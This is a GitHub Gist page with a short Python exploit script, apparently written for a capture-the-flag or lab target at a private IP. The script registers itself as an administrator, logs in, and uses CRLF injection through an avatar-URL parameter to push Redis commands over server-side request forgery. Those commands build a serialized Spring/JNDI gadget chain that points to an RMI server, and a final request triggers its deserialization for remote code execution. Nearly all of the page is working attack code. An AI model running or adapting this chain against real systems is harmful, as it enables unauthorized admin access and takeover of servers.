Instantly share code, notes, and snippets.

@Tom4t0 /show_me_the_shell.py
Created May 26, 2018

Embed
What would you like to do?
Download ZIP
Raw
show_me_the_shell.py
import requests
def register(url):
reg_url = url + '/doregister.do'
post_data = {'username':'admin','password':'admin123','repassword':'admin123','isadmin':'1'}
resp = requests.post(url=reg_url,data=post_data)
def login(url):
req = requests.Session()
login_url = url + '/login.do'
post_data = {'username':'admin','password':'admin123'}
response = req.post(url=login_url,data=post_data,allow_redirects=False)
cookie_value = response.headers['Set-Cookie']
last_cookie = cookie_value.split(';')[0].split('=')[1]
return last_cookie
def exploit(url,cookie_value):
headers = {'Cookie':'JSESSIONID={cookie_value}'.format(cookie_value=cookie_value)}
step1 = {"url":"http://127.0.0.1\r\n\r\nset post27 \"\\x01\\x00java.util.HashMa\\xf0\\x01\\x02\\x01\\x01\\xc2\\x01org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\\x01\\x01rmi\"\r\n\r\n:6379/1.jpg"}
step2 = {"url":"http://127.0.0.1\r\n\r\neval \"return redis.call('append','post27',string.char(0x3a,0x2f,0x2f))\" 0\r\n\r\n:6379/1.jpg"}
step3 = {"url":"http://127.0.0.1\r\n\r\nappend post27 rmiserver\r\n\r\n:6379/1.jpg"}
step4 = {"url":"http://127.0.0.1\r\n\r\neval \"return redis.call('append','post27',string.char(0x2f))\" 0\r\n\r\n:6379/1.jpg"}
step5 = {"url":"http://127.0.0.1\r\n\r\nappend post27 \"Objec\\xf4\\x01\\x02org.springframework.jndi.support.SimpleJndiBeanFactor\\xf9\\x01\\x01\\x03org.springframework.jndi.JndiTemplat\\xe5\\x01\\x00\\x01\\x04org.apache.commons.logging.impl.NoOpLo\\xe7\\x01\\x01\\x04\\x01\\x01\\x01\\x00\\x01\\x00\\x01\\x05java.util.HashSe\\xf4\\x01\\x01\\x03\\x04\\x01\\x00\\x01\\x00\\x00\\x01\\x06org.springframework.aop.TruePointcu\\xf4\\x01\\x01\\x01\\x03\\x01\\x01\\x01\\x00\\x00\\x00\\x01\\x06\\x0c\\x01\\x01\\n\"\r\n\r\n:6379/1.jpg"}
steplist = [step1,step2,step3,step4,step5]
for step in steplist:
exploit_url = url + '/user/headimg.do'
resp = requests.get(url=exploit_url,headers=headers,params=step)
resp = requests.get(url=url+'/manage/check.do?pid=27',headers=headers)
if __name__ == '__main__':
url = 'http://192.168.201.25'
register(url)
cookie=login(url)
exploit(url,cookie)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment